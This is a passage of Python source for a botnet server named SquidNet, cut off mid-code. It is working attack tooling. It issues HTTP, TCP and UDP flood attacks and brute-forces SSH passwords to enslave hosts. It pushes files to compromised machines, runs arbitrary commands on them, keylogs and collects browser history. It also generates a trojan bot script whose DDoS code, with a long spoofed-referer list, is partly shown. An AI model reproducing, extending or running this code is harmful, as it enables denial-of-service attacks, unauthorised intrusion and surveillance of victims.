except Exception as e:
self.log(f"\n[(ERROR)]: {str(e)}")
hashed_passw = hashlib.sha256(passw).hexdigest()
if hashed_passw == self.admin_password and name == self.admin_name:
try:
admin = True
print(f"[!] {hostname} is an Admin!")
hostname = f"ADMIN)({hostname}"
msgtoadmin = f"[(SERVER)]: {hostname} is an Admin!"
self.log("\n" + msgtoadmin)
for admi in self.admin_conn:
try:
admi.send(msgtoadmin.encode())
except Exception as e:
self.log(f"\n[(ERROR)]: {str(e)}")
self.admin_conn.append(c)
try:
c.send(self.welcomemsg.encode())
except:
pass
self.log(f"\n[(SERVER)---->({hostname})]: Sent welcome message.")
self.admininfo.append(info)
except:
pass
else:
c.send("Access Denied!".encode())
msgtoall = f"[(ATTEMPTEDBREACHWARNING)]: {hostname} attempted to login to the botnet with incorrect credentials!\n[(ATTEMPTEDBREACHWARNING)]: Closing Connection...."
self.log("\n" + msgtoall)
print(msgtoall)
for admins in self.admin_conn:
try:
admins.send(msgtoall.encode())
except Exception as e:
self.log(f"\n[(ERROR)]: {str(e)}")
c.close()
break
elif msg.startswith("!sendkey"):
msg_split = msg.split()
del msg_split[0]
main_msg = ""
for i in msg_split:
main_msg = main_msg + " " + i
main_msg = main_msg.strip()
logthis = f"[({hostname})]: {main_msg}"
if self.displaykeys:
print(logthis)
if self.obtaininghistory:
try:
if msg.decode().strip() == "":
pass
else:
self.historyfile.write(f"\n[({hostname})]: ".encode() + msg)
except:
self.historyfile.write(f"\n[({hostname})]: ".encode() + msg)
if admin:
if msg.startswith('!httpflood'):
msgtobot = msg.split()
try:
targ_website = msgtobot[1]
atk_delay = msgtobot[2]
servmsg = f"[({hostname})]: Beginning HTTP Flood Attack on {targ_website} with delay of {atk_delay}.\n"
self.log("\n" + servmsg)
print(servmsg)
c.send(
f"Successfully started an HTTP Flood Attack on {targ_website} wth a delay of {atk_delay}".encode())
self.log(
f"\n[(SERVER)---->({hostname})]: Successfully started an HTTP Flood Attack on {targ_website} wth a delay of {atk_delay}")
except:
msg = "help"
c.send("Invalid Parameters!".encode())
self.log(
f"\n[(SERVER)---->({hostname})]: Invalid Parameters!")
elif msg.startswith('!tcpflood'):
msgtobot = msg.split()
try:
target = msgtobot[1]
servmsg = f"[({hostname})]: Beginning TCP Flood Attack on {target}.\n"
self.log("\n" + servmsg)
print(servmsg)
c.send(
f"Successfully started a TCP Flood Attack on {target}".encode())
self.log(
f"\n[(SERVER)---->({hostname})]: Successfully started a TCP Flood Attack on {target}")
except:
msg = "help"
c.send("Invalid Parameters!".encode())
self.log(
f"\n[(SERVER)---->({hostname})]: Invalid Parameters!")
elif msg.startswith("!getchromehistory"):
try:
file = open("BotsHistory.txt", "rb").read()
if len(str(file)) == 0:
c.send(
"[(SERVER)]: Unable to send Bots history from the bots(Needs to be obtained on the server-side).".encode())
else:
c.send("[(SERVER)]:".encode() + file)
except:
c.send(
"[(SERVER)]: Unable to send Bots history from the bots(Needs to be obtained on the server-side).".encode())
elif msg.startswith('!udpflood'):
msgtobot = msg.split()
try:
target = msgtobot[1]
servmsg = f"[({hostname})]: Beginning UDP Flood Attack on {target}.\n"
self.log("\n" + servmsg)
print(servmsg)
c.send(
f"Successfully started a UDP Flood Attack on {target}".encode())
self.log(
f"\n[(SERVER)---->({hostname})]: Successfully started a UDP Flood Attack on {target}")
except:
msg = "help"
c.send("Invalid Parameters!".encode())
self.log(
f"\n[(SERVER)---->({hostname})]: Invalid Parameters!")
elif msg.startswith('!help'):
c.send(self.welcomemsg.encode())
elif msg.startswith("!infect"):
if self.passfile != False:
msg_split = msg.split()
ip = msg_split[1]
username = msg_split[2]
bruteforcer = threading.Thread(target=self.ssh_infect, args=(ip, username))
bruteforcer.start()
else:
c.send(
"[(SERVER)]: Botnet is configured without ssh bruteforcing. Cannot bruteforce!".encode())
self.log(
f"\n[(SERVER)---->({hostname})]: Botnet is configured without ssh bruteforcing. Cannot bruteforce!")
elif msg.startswith("!keylog"):
msg_split = msg.split()
try:
self.displaykeys = bool(msg_split[1])
except:
self.displaykeys = False
self.log("\n[(SERVER)]: Started Keylogging on the bots.")
c.send(
f"[(SERVER)]: Set displaying Key-inputs to the server to: {self.displaykeys}".encode())
elif msg.startswith("!stopkeylog"):
self.log("\n[(SERVER)]: Stopped Keylogging on the bots.")
elif msg.startswith("!sshlogin"):
msg_split = msg.split()
ip = msg_split[1]
username = msg_split[2]
password = msg_split[3]
login = threading.Thread(target=self.ssh_login, args=(ip, username, password))
login.start()
elif msg.startswith("!getconninfo"):
c.send(str("[(SERVER)]:\n" + self.gen_conntable()).encode())
self.log(f"\n[(SERVER)---->({hostname})]:\n{self.gen_conntable()}")
elif msg.startswith("!inject"):
msg_split = msg.split()
file = msg_split[1]
for bot in self.ssh_bots:
self.ssh_inject(bot, file)
elif msg.startswith("!listsshbots"):
c.send(f"[(SERVER)]: Connected SSH Bots: {self.display_bots}".encode())
self.log(f"\n[(SERVER)---->({hostname})]: Connected SSH Bots: {self.display_bots}")
if "!login" in msg.strip() or "!help" in msg.strip() or "!getconninfo" in msg.strip() or "!listsshbots" in msg.strip() or "!getchromehistory" in msg.strip() or self.obtaininghistory:
pass
else:
if len(self.ssh_bots) != 0:
sendtossh = threading.Thread(target=self.send_ssh, args=(msg,))
sendtossh.start()
for connect in self.conn_list:
if connect in self.admin_conn:
pass
else:
try:
connect.send(msg.encode())
except:
connect.send(msg)
if msg == "" or msg == " ":
pass
else:
if self.savefile:
try:
if msg.decode() == "finished":
savefile = False
except:
pass
filenames = f"{number}{self.botfile}"
file_created = False
try:
file = open(filenames, 'rb')
file_content = file.read()
file_created = True
except:
file = open(filenames, 'wb')
file.write(msg)
file_content = msg
file.close()
file_created = True
if file_created:
file = open(filenames, 'wb')
try:
file.write(file_content.encode())
except:
file.write(file_content)
try:
file.write(msg.encode())
except:
file.write(msg)
file.close()
filemsg = f"\n[({hostname})]: Saved contents of {self.botfile} into {filenames}"
print(filemsg)
self.log(filemsg)
file_created = False
elif not self.savefile:
try:
if not self.obtaininghistory:
msgtoadmin = f"[({hostname})]: {msg.strip()}"
self.log("\n" + msgtoadmin)
if not msg.startswith("!sendkey"):
print("\n" + msgtoadmin)
except Exception as e:
self.log(f"\n[(ERROR)]: {e}")
for adminconn in self.admin_conn:
try:
if c == adminconn:
pass
else:
adminconn.send(msgtoadmin.encode())
except Exception as e:
self.log(f"\n[(ERROR)]: Unable to send msg to: {adminconn}.")
except Exception as e:
if "a bytes-like object is required, not 'str'" in str(
e) or "An operation was attempted on something that is not a socket" in str(
e) or "startswith first arg must be bytes or a tuple of bytes, not str" in str(e):
self.log(f"\n[(ERROR)]: Ignoring Error {e} in {hostname}")
else:
self.log(
f"\n[(ERROR)]: {hostname} seems defective(Error: {e}).\n[(CLOSECONN)]: Closing connection....")
print(f"\n[!] {hostname} seems defective.\n[!] Closing connection....\n")
c.close()
break
def ssh_login(self, ip, username, password):
"""Does regular logging in with SSH into the provided ip and username. There is no
brute-forcing since a password arguement has be passed, and that the brute-force text
file is not used."""
print(f"[+] Attempting to login to {username}@{ip}\n[+] With password: {password}")
msgtoadmin = f"[(SERVER)]: Attempting to login to {username}@{ip}\n[(SERVER)]: With password: {password}"
self.log('\n' + msgtoadmin)
for admin in self.admin_conn:
try:
admin.send(msgtoadmin.encode())
except:
pass
try:
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(ip, 22, username, password)
self.ips.append(ip)
self.display_bots.append(f"{username}@{ip}")
self.ssh_bots.append(client)
self.ssh_info.append(str(username) + " " + str(ip) + " " + str(password))
self.ssh_botlist.append(str(client) + ' ' + str(username))
msgtoadmin = f"[(SERVER)]: {ip}'s Password has been found!: {password}\n[(SERVER)] Adding {username}@{ip} to the botnet.\n"
self.log('\n' + msgtoadmin)
for admin in self.admin_conn:
try:
admin.send(msgtoadmin.encode())
except:
pass
print(
f"\n[!] Successfully logged into {username}@{ip} with {password}!\n[!] Adding {username}@{ip} to the botnet.\n")
except Exception as e:
print(f"[+] Unable to login to {ip}@{username}\n[+] Try using different credentials.")
msgtoadmin = f"[(SERVER)]: Unable to log into {username}@{ip} due to: {e}"
self.log("\n" + msgtoadmin)
for admin in self.admin_conn:
try:
admin.send(msgtoadmin.encode())
except:
pass
def ssh_infect(self, ip, username):
"""Attempts to brute force the ip and username with the password list provided
from the txt file specified in the __init__ function."""
print(f"[+] Brute Forcing the Password for: {username}@{ip}\n")
msgtoadmin = f"[(SERVER)]: Brute Forcing the Password for: {username}@{ip}\n"
self.log('\n' + msgtoadmin)
for admin in self.admin_conn:
try:
admin.send(msgtoadmin.encode())
except:
pass
flag = 0
for password in self.passwords:
try:
if flag == 1:
break
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
passw = password.strip()
client.connect(ip, 22, username, passw, timeout=2, auth_timeout=2)
self.ips.append(ip)
self.display_bots.append(f"{username}@{ip}")
self.ssh_bots.append(client)
self.ssh_info.append(str(username) + " " + str(ip) + " " + str(passw))
self.ssh_botlist.append(str(client) + ' ' + str(username))
msgtoadmin = f"[(SERVER)]: {ip}'s Password has been found!: {passw}\n[(SERVER)] Adding {username}@{ip} to the botnet.\n"
self.log('\n' + msgtoadmin)
for admin in self.admin_conn:
try:
admin.send(msgtoadmin.encode())
except:
pass
print(f"\n[!] {ip}'s Password has been found!: {passw}\n[!] Adding {username}@{ip} to the botnet.\n")
flag = 1
break
except:
client.close()
if flag == 0:
msgtoadmin = f"[(SERVER)]: Unable to Brute Force password for {username}@{ip}"
self.log("\n" + msgtoadmin)
for admin in self.admin_conn:
try:
admin.send(msgtoadmin.encode())
except:
pass
print(f"\n[?] Unable to Brute Force password for {username}@{ip}")
def send_ssh(self, instruction):
"""Sends instructions to the SSH-Bots. The output will also be sent
back to the Server for the admins to see."""
try:
for bot in self.ssh_bots:
for usernames in self.ssh_botlist:
if str(bot) in usernames:
split_item = usernames.split()
username = split_item[4]
try:
stdin, stdout, stderr = bot.exec_command(instruction, get_pty=True)
stdin.close()
output = stdout.read().decode()
if output.strip() == "":
pass
else:
msgtoclient = f"\n[({username})]: {output.strip()}"
self.log(msgtoclient)
print(msgtoclient)
for admin in self.admin_conn:
try:
admin.send(msgtoclient.encode())
except:
self.log(f"[(ERROR)]: Unable to send message to {admin}.")
except:
bot.close()
except:
pass
def ssh_inject(self, client, file):
"""This function Opens up SFTP(Secure File Transfer Protocol) and
sends a file to the SSH-Bots, where they can be opened up on command."""
try:
if "/" in file or "\\" in file:
result = ""
for letter in file:
if letter == "/" or letter == "\\":
result += " "
else:
result += letter
split_result = result.split()
file = split_result[(len(split_result) - 1)]
file_dir = ""
for item in split_result:
if item == file:
pass
else:
file_dir = file_dir + item + "/"
os.chdir(file_dir)
for usernames in self.ssh_botlist:
if str(client) in usernames:
split_item = usernames.split()
username = split_item[4]
try:
sftp = client.open_sftp()
sftp.put(file, f'C:/{username}/{file}')
except:
sftp = client.open_sftp()
sftp.put(file, f'/Users/{username}/{file}')
os.chdir(self.cwd)
except:
pass
def reset_historyvar(self):
"""Resets the 'self.obtaininghistory' variable to false,
so that the bot messages would return to normal."""
time.sleep(10)
self.obtaininghistory = False
self.historyfile.close()
print("\n[+] You are now able to freely send messages to the bots.")
def instruct(self):
"""Server-Side Sending intructions to the bots. This is so that the Server
can also send packets to the Bots which they can send info back to the Server
and admins."""
self.savefile = False
while True:
try:
self.instruction = input("[+] Enter instruction to the bots: ")
if self.instruction == "!botcount":
print(f"[+] Current Connected Bots: {self.bot_count}\n")
elif self.instruction == "!clear":
if sys.platform == "win32":
os.system("cls")
else:
os.system("clear")
self.logo()
self.usage()
elif self.instruction.startswith('!savefile'):
instruction_split = self.instruction.split()
self.botfile = instruction_split[1]
self.savefile = True
print("[+] Savefile commenced")
elif self.instruction.startswith("!genadminscript"):
filename = "SquidNetMaster.py"
contents = self.gen_admin()
file = open(filename, 'w')
file.write(contents)
file.close()
print(f"[+] File '{filename}' has been generated in dir '{os.getcwd()}'\n")
self.log(f"\n[(FILECREATION)]: File '{filename}' has been generated in dir '{os.getcwd()}'\n")
elif self.instruction.startswith("!httpflood"):
msgtobot = self.instruction.split()
try:
targ_website = msgtobot[1]
atk_delay = msgtobot[2]
print(f"[+] Beginning HTTP Flood Attack on {targ_website} with delay of {atk_delay}.\n")
except:
self.instruction = "help"
print("[+] Invalid Parameters!\n")
elif self.instruction.startswith("!getchromehistory"):
self.obtaininghistory = True
print(
"[+] Obtaining Bot Chrome history. It is highly suggested you do not give any commands at the moment.")
print("[+] Please wait 10 seconds before doing anything.")
self.historyfile = open("BotsHistory.txt", "wb")
print("[+] File with Bot Chrome History: BotsHistory.txt")
resetter = threading.Thread(target=self.reset_historyvar)
resetter.start()
elif self.instruction.startswith("!tcpflood"):
msgtobot = self.instruction.split()
try:
target = msgtobot[1]
print(f"[+] Beginning TCP Flood Attack on {target}.\n")
except:
self.instruction = "help"
print("[+] Invalid Parameters!\n")
elif self.instruction.startswith("!udpflood"):
msgtobot = self.instruction.split()
try:
target = msgtobot[1]
print(f"[+] Beginning UDP Flood Attack on {target}.\n")
except:
self.instruction = "help"
print("[+] Invalid Parameters!\n")
elif self.instruction == "!resettoken":
self.key = Fernet.generate_key()
with open('token.txt', 'w') as tokenfile:
tokenfile.write(str(self.key))
tokenfile.close()
print(
f"[+] The token has been reset to: {str(self.key)}\n[+] Note that you should regenerate a script to have the same token as the one in this script.\n")
self.log(f"\n[(TOKENRESET)]: Encryption key changed to: {str(self.key)}")
elif self.instruction == "!genscript":
filename = 'SquidNetBot.py'
file = open(filename, 'w')
contents = self.bot_script()
file.write(contents)
file.close()
print(f"[+] File '{filename}' has been generated in dir '{os.getcwd()}'\n")
self.log(f"\n[(FILECREATION)]: File '{filename}' has been generated in dir '{os.getcwd()}'\n")
elif self.instruction == "!stopatk":
print("[+] Attempting to stop all DDoS Attacks in the botnet.\n")
self.log("\n[(STOPATK)]: Attempting to stop all DDoS Attacks in the botnet.\n")
elif self.instruction == "!help":
self.usage()
elif self.instruction.startswith("!infect"):
if self.passfile != False:
instruction_split = self.instruction.split()
ip = instruction_split[1]
username = instruction_split[2]
brute_force = threading.Thread(target=self.ssh_infect, args=(ip, username))
brute_force.start()
else:
print("[+] Unable to bruteforce. Configure a password file to do so.\n")
elif self.instruction.startswith("!inject"):
msg_split = self.instruction.split()
filename = msg_split[1]
self.log(f"\n[(SERVER)]: Infecting all SSH Bots with {filename}")
for bot in self.ssh_bots:
injector = threading.Thread(target=self.ssh_inject, args=(bot, filename))
injector.start()
elif self.instruction.startswith("!listsshbots"):
print(f"[+] Connected SSH Bots: {self.display_bots}")
elif self.instruction.startswith("!keylog"):
msg_split = self.instruction.split()
try:
self.displaykeys = bool(msg_split[1])
except:
self.displaykeys = False
print(f"[+] Setting Display key-inputs to output to: {self.displaykeys}.")
self.log("\n[(SERVER)]: Started Keylogging on the bots.")
elif self.instruction.startswith("!stopkeylog"):
self.log("\n[(SERVER)]: Stopped Keylogging on the bots.")
elif self.instruction.startswith("!sshlogin"):
msg_split = self.instruction.split()
ip = msg_split[1]
username = msg_split[2]
password = msg_split[3]
self.ssh_login(ip, username, password)
elif self.instruction.startswith("!getconninfo"):
print(self.gen_conntable())
self.log(f"[(SERVER)]: Displayed Conn Table for Server.\n{self.gen_conntable()}")
elif self.instruction.startswith("!editfile"):
msg_split = self.instruction.split()
filename = msg_split[1]
print(f"[+] Attempting to open file editor for file {filename} on the bots.")
self.log(f"\n[(SERVER)]: Attempting to open file editor for file {filename} on the bots.")
elif self.instruction.startswith("!togglelisten"):
if self.listenforconn == True:
print("[+] Stopped listening for connections.\n")
self.log("\n[(SERVER)]: Stopped listening for connections.")
self.listenforconn = False
else:
print("[+] Restarted listening for connections.\n")
self.log("\n[(SERVER)]: Started to listen for connections.")
self.listenforconn = True
elif self.instruction.startswith("!kick"):
msg_split = self.instruction.split()
host = msg_split[1]
port = msg_split[2]
conntokick = ""
for i in self.connportlist:
if host + "" in i and port + " " in i:
conntokick = i
break
if conntokick == "":
print("\n[+] Hostname or port is not registered in the botnet.")
self.log(
f"\n[(SERVER)]: Attempted to kick {host} from source port {port} but it did not exist.")
else:
for conn in self.conn_list:
if str(conn) in conntokick:
print(f"\n[+] Successfully kicked {host}.")
self.log(f"\n[(SERVER)]: Kicked {host} at source port: {port}")
conn.close()
break
elif self.instruction.startswith("!whatsnew"):
print("""
[+] New Features In the SquidNet:
[+] - Added Web-Interface(http://127.0.0.1:8080)!
[+] - Fixed Variable bug in regular SSH Login Function(passw-->password)
[+] - Optimized the code.
[+] - Fixed web-interface server slowing down Botnet.
[+] - Fixed NotSamePassException Errors.
[+] - Fixed Error in self.send_ssh that would flood output with errors.
[+] - Fixed Error in Stopping DDoS Attacks(tried to call a bool object and not function).
[+] - Made password list optional(however brute forcing cannot happen).
[+] - Added '!cloneself' Command.
[+] - Fixed more errors on the admins being kicked without reason.
[+] - Upgraded reverse shell messages.
[+] - Added '!getconninfo' Command.
[+] - Made it so that '!clear', '!genscript' and '!genadminscript' are not sent to the clients.
[+] - Fixed typos.
[+] - Added '!kick' and '!togglelisten'
[+] - Added Keylogging to the bots.
[+] - Added display message when there is an error with binding the server.
[+] - Fixed bug that kicks bots when wanting to view content from a file remotely or when sending bytes.
[+] - Improved Logging Function.
[+] - Replace '--nH' and '--nP' arguements with '--eH' and '--eP'(external-host and port).
[+] - Replaced some text in the help message.
[+] - Made default admin password a random integer, rather than 'root'.
[+] - Removed unnessecary modules.
[+] - Chrome history obtaining is now possible on the bots ;).
[+] - Changed hashing algorithim to sha256.
""")
if "!clear" in self.instruction.strip() or "!genscript" in self.instruction.strip() or "!genadminscript".strip() in self.instruction.strip() or "!whatsnew" in self.instruction.strip() or "!getconninfo" in self.instruction.strip() or "listsshbots" in self.instruction.strip() or "!togglelisten" in self.instruction.strip():
pass
else:
if len(self.ssh_bots) != 0:
sendtossh = threading.Thread(target=self.send_ssh, args=(self.instruction,))
sendtossh.start()
self.log(f"\n[(SERVER)---->(ADMINS)]: Sent '{self.instruction}' to the bots.")
for conn in self.conn_list:
try:
if conn in self.admin_conn:
conn.send(f"[(SERVER)]: Sent '{self.instruction}' to the bots.".encode())
else:
conn.send(self.instruction.encode())
except:
self.log(f"\n[(ERROR)]: Unable to send message to {conn}.")
self.log(f"\n[(SERVER)]: {self.instruction}")
except Exception as e:
self.log(f"\n[(ERROR)]: {str(e)}")
def gen_admin(self):
"""Generates the admin for remote admin connections to the BotNet."""
script = """
import socket, threading, os, time, urllib.request, sys
class BotMaster:
def __init__(self, ip, port, name, admin_password):
self.ip = ip
self.port = port
self.client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.client.connect((self.ip, self.port))
msg = str(socket.gethostname() + " " + self.getip() + " " + os.getlogin()+" "+sys.platform).encode()
self.client.send(msg)
self.name = name
self.admin_password = admin_password
time.sleep(1)
self.client.send("!CLIENTLOG".encode())
time.sleep(1)
self.client.send(f"!login {self.name} {self.admin_password}".encode())
self.logo()
print("\\n[+] Successfully logged into the Botnet!")
print("[+] You are able to access the Botnet and also give commands to all of the connected bots!")
print("")
self.reciever = threading.Thread(target=self.recv)
self.reciever.start()
self.sender = threading.Thread(target=self.send)
self.sender.start()
def logo(self):
print('''
_____ _ _ __ __ _
/ ____| (_) | | \/ | | |
| (___ __ _ _ _ _ __| | \ / | __ _ ___| |_ ___ _ __
\___ \ / _` | | | | |/ _` | |\/| |/ _` / __| __/ _ \ '__|
____) | (_| | |_| | | (_| | | | | (_| \__ \ || __/ |
|_____/ \__, |\__,_|_|\__,_|_| |_|\__,_|___/\__\___|_|
| |
|_|
SquidNet Admin Script By DrSquid''')
def getip(self):
try:
url = 'https://httpbin.org/ip'
req = urllib.request.Request(url)
result = urllib.request.urlopen(req)
try:
result = result.read().decode()
except:
result = result.read()
contents = result.split()
ip = contents[2].strip('"')
return ip
except:
pass
def send(self):
while True:
try:
msg = input("[(ADMIN)]: ")
self.client.send(msg.encode())
except:
print("[+] There may be a server error. Try to relogin to the botnet.")
def recv(self):
while True:
try:
msg = self.client.recv(65500).decode()
if msg == "":
pass
else:
print('\\n' + msg)
except:
print("\\n[+] Possible Server Error! Try to re-login to the Botnet!")
print("[+] If this is a re-occuring message, contact the Server Owner.")
print("\\n[+] Attempting to re-connect to the server.")
while True:
try:
self.client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.client.connect((self.ip, self.port))
msg = str(
socket.gethostname() + " " + self.getip() + " " + os.getlogin() + " " + sys.platform).encode()
self.client.send(msg)
time.sleep(1)
self.client.send("!CLIENTLOG".encode())
time.sleep(1)
self.client.send(f"!login {self.name} {self.admin_password}".encode())
print("[+] Successfully Logged Back Into the botnet.")
break
except:
pass
admin = BotMaster('""" + self.ngroklink + """',""" + str(
self.ngrokport) + """,'""" + self.admin_name + """','""" + self.passw + """')
"""
return script
def bot_script(self):
"""Generates the Bot Trojan Script needed to connect to this server and run commands from it.
Test it and see what it does! It will respond to all commands, and it will do either any of
the in-built commands or run any other instructions with command prompt/terminal."""
script = """
#-----SquidNet-Bot-Script-----#
import socket, time, os, threading, urllib.request, shutil, sys, random, base64, sqlite3, json, subprocess, re, shutil, ctypes
from datetime import datetime, timedelta
try:
from pynput.keyboard import Listener # pip install pynput
except:
pass
try:
import win32crypt # pip install pypiwin32
except:
pass
try:
from cryptography.fernet import Fernet # pip install cryptography
except:
pass
try:
from Crypto.Cipher import AES # pip install pycryptodome
except:
pass
class DDoS:
def __init__(self, ip, delay):
self.ip = ip
self.delay = delay
self.stopatk = False
self.useragents = self.obtain_user_agents()
self.referers = self.obtain_referers()
self.threader = threading.Thread(target=self.start_thr)
self.threader.start()
def obtain_referers(self):
referers = ['http://www.google.com/?q=', 'http://yandex.ru/yandsearch?text=%D1%%D2%?=g.sql()81%..',
'http://vk.com/profile.php?redirect=', 'http://www.usatoday.com/search/results?q=',
'http://engadget.search.aol.com/search?q=query?=query=..',
'https://www.google.ru/#hl=ru&newwindow=1?&saf..,or.r_gc.r_pw=?.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=882',
'https://www.google.ru/#hl=ru&newwindow=1&safe..,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=925',
'http://yandex.ru/yandsearch?text=',
'https://www.google.ru/#hl=ru&newwindow=1&safe..,iny+gay+q=pcsny+=;zdr+query?=poxy+pony&gs_l=hp.3.r?=.0i19.505.10687.0.10963.33.29.4.0.0.0.242.4512.0j26j3.29.0.clfh..0.0.dLyKYyh2BUc&pbx=1&bav=on.2,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp?=?fd2cf4e896a87c19&biw=1389&bih=832',
'http://go.mail.ru/search?mail.ru=1&q=', 'http://nova.rambler.ru/search?=btnG?=%D0?2?%D0?2?%=D0..',
'http://ru.wikipedia.org/wiki/%D0%9C%D1%8D%D1%x80_%D0%..',
'http://ru.search.yahoo.com/search;_yzt=?=A7x9Q.bs67zf..',
'http://ru.search.yahoo.com/search;?_query?=l%t=?=?A7x..',
'http://go.mail.ru/search?gay.ru.query=1&q=?abc.r..',
'/#hl=en-US?&newwindow=1&safe=off&sclient=psy=?-ab&query=%D0%BA%D0%B0%Dq=?0%BA+%D1%83%()_D0%B1%D0%B=8%D1%82%D1%8C+%D1%81bvc?&=query&%D0%BB%D0%BE%D0%BD%D0%B0q+=%D1%80%D1%83%D0%B6%D1%8C%D0%B5+%D0%BA%D0%B0%D0%BA%D0%B0%D1%88%D0%BA%D0%B0+%D0%BC%D0%BE%D0%BA%D0%B0%D1%81%D0%B8%D0%BD%D1%8B+%D1%87%D0%BB%D0%B5%D0%BD&oq=q=%D0%BA%D0%B0%D0%BA+%D1%83%D0%B1%D0%B8%D1%82%D1%8C+%D1%81%D0%BB%D0%BE%D0%BD%D0%B0+%D1%80%D1%83%D0%B6%D1%8C%D0%B5+%D0%BA%D0%B0%D0%BA%D0%B0%D1%88%D0%BA%D0%B0+%D0%BC%D0%BE%D0%BA%D1%DO%D2%D0%B0%D1%81%D0%B8%D0%BD%D1%8B+?%D1%87%D0%BB%D0%B5%D0%BD&gs_l=hp.3...192787.206313.12.206542.48.46.2.0.0.0.190.7355.0j43.45.0.clfh..0.0.ytz2PqzhMAc&pbx=1&bav=on.2,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=?882',
'http://nova.rambler.ru/search?btnG=%D0%9D%?D0%B0%D0%B..',
'http://www.google.ru/url?sa=t&rct=?j&q=&e..',
'http://help.baidu.com/searchResult?keywords=', 'http://www.bing.com/search?q=',
'https://www.yandex.com/yandsearch?text=', 'https://duckduckgo.com/?q=',
'http://www.ask.com/web?q=',
'http://search.aol.com/aol/search?q=', 'https://www.om.nl/vaste-onderdelen/zoeken/?zoeken_term=',
'https://drive.google.com/viewerng/viewer?url=', 'http://validator.w3.org/feed/check.cgi?url=',
'http://host-tracker.com/check_page/?furl=',
'http://www.online-translator.com/url/translation.aspx?direction=er&sourceURL=',
'http://jigsaw.w3.org/css-validator/validator?uri=', 'https://add.my.yahoo.com/rss?url=',
'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=',
'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=',
'https://steamcommunity.com/market/search?q=', 'http://filehippo.com/search?q=',
'http://www.topsiteminecraft.com/site/pinterest.com/search?q=',
'http://eu.battle.net/wow/en/search?q=',
'http://engadget.search.aol.com/search?q=', 'http://careers.gatesfoundation.org/search?q=',
'http://techtv.mit.edu/search?q=', 'http://www.ustream.tv/search?q=',
'http://www.ted.com/search?q=',
'http://funnymama.com/search?q=', 'http://itch.io/search?q=', 'http://jobs.rbs.com/jobs/search?q=',
'http://taginfo.openstreetmap.org/search?q=', 'http://www.baoxaydung.com.vn/news/vn/search&q=',
'https://play.google.com/store/search?q=', 'http://www.tceq.texas.gov/@@tceq-search?q=',
'http://www.reddit.com/search?q=', 'http://www.bestbuytheater.com/events/search?q=',
'https://careers.carolinashealthcare.org/search?q=', 'http://jobs.leidos.com/search?q=',
'http://jobs.bloomberg.com/search?q=', 'https://www.pinterest.com/search/?q=',
'http://millercenter.org/search?q=', 'https://www.npmjs.com/search?q=',
'http://www.evidence.nhs.uk/search?q=', 'http://www.shodanhq.com/search?q=',
'http://ytmnd.com/search?q=',
'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=',
'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=',
'https://steamcommunity.com/market/search?q=', 'http://filehippo.com/search?q=',
'http://www.topsiteminecraft.com/site/pinterest.com/search?q=',
'http://eu.battle.net/wow/en/search?q=',
'http://engadget.search.aol.com/search?q=', 'http://careers.gatesfoundation.org/search?q=',
'http://techtv.mit.edu/search?q=', 'http://www.ustream.tv/search?q=',
'http://www.ted.com/search?q=',
'http://funnymama.com/search?q=', 'http://itch.io/search?q=', 'http://jobs.rbs.com/jobs/search?q=',
'http://taginfo.openstreetmap.org/search?q=', 'http://www.baoxaydung.com.vn/news/vn/search&q=',
'https://play.google.com/store/search?q=', 'http://www.tceq.texas.gov/@@tceq-search?q=',
'http://www.reddit.com/search?q=', 'http://www.bestbuytheater.com/events/search?q=',
'https://careers.carolinashealthcare.org/search?q=', 'http://jobs.leidos.com/search?q=',
'http://jobs.bloomberg.com/search?q=', 'https://www.pinterest.com/search/?q=',
'http://millercenter.org/search?q=', 'https://www.npmjs.com/search?q=',
'http://www.evidence.nhs.uk/search?q=', 'http://www.shodanhq.com/search?q=',
'http://ytmnd.com/search?q=',
'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=',
'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=',
'https://steamcommunity.com/market/search?q=', 'http://filehippo.com/search?q=',
'http://www.topsiteminecraft.com/site/pinterest.com/search?q=',
'http://eu.battle.net/wow/en/search?q=',
'http://engadget.search.aol.com/search?q=', 'http://careers.gatesfoundation.org/search?q=',
'http://techtv.mit.edu/search?q=', 'http://www.ustream.tv/search?q=',
'http://www.ted.com/search?q=',
'http://funnymama.com/search?q=', 'http://itch.io/search?q=', 'http://jobs.rbs.com/jobs/search?q=',
'http://taginfo.openstreetmap.org/search?q=', 'http://www.baoxaydung.com.vn/news/vn/search&q=',
'https://play.google.com/store/search?q=', 'http://www.tceq.texas.gov/@@tceq-search?q=',
'http://www.reddit.com/search?q=', 'http://www.bestbuytheater.com/events/search?q=',
'https://careers.carolinashealthcare.org/search?q=', 'http://jobs.leidos.com/search?q=',
'http://jobs.bloomberg.com/search?q=', 'https://www.pinterest.com/search/?q=',
'http://millercenter.org/search?q=', 'https://www.npmjs.com/search?q=',
'http://www.evidence.nhs.uk/search?q=', 'http://www.shodanhq.com/search?q=',
'http://ytmnd.com/search?q=',
'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=',
'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=',
'https://steamcommunity.com/market/search?q=', 'http://filehippo.com/search?q=',
'http://www.topsiteminecraft.com/site/pinterest.com/search?q=',
'http://eu.battle.net/wow/en/search?q=',
'http://engadget.search.aol.com/search?q=', 'http://careers.gatesfoundation.org/search?q=',
'http://techtv.mit.edu/search?q=', 'http://www.ustream.tv/search?q=',
'http://www.ted.com/search?q=',
'http://funnymama.com/search?q=', 'http://itch.io/search?q=', 'http://jobs.rbs.com/jobs/search?q=',
'http://taginfo.openstreetmap.org/search?q=', 'http://www.baoxaydung.com.vn/news/vn/search&q=',
